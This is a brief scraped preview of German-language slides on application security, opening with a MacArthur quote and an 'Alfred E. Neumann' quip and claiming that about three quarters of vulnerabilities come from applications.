There is no security on this earth. Na und? General Douglas MacArthur. Alfred E. Neumann There is no security on this earth. Na und? General Douglas MacArthur Alfred E. Neumann Anwendungen verursachen Unsicherheit Ca. ¾ aller Schwachstellen stammen aus Anwendungen. Cryptography 0% Application

Mehr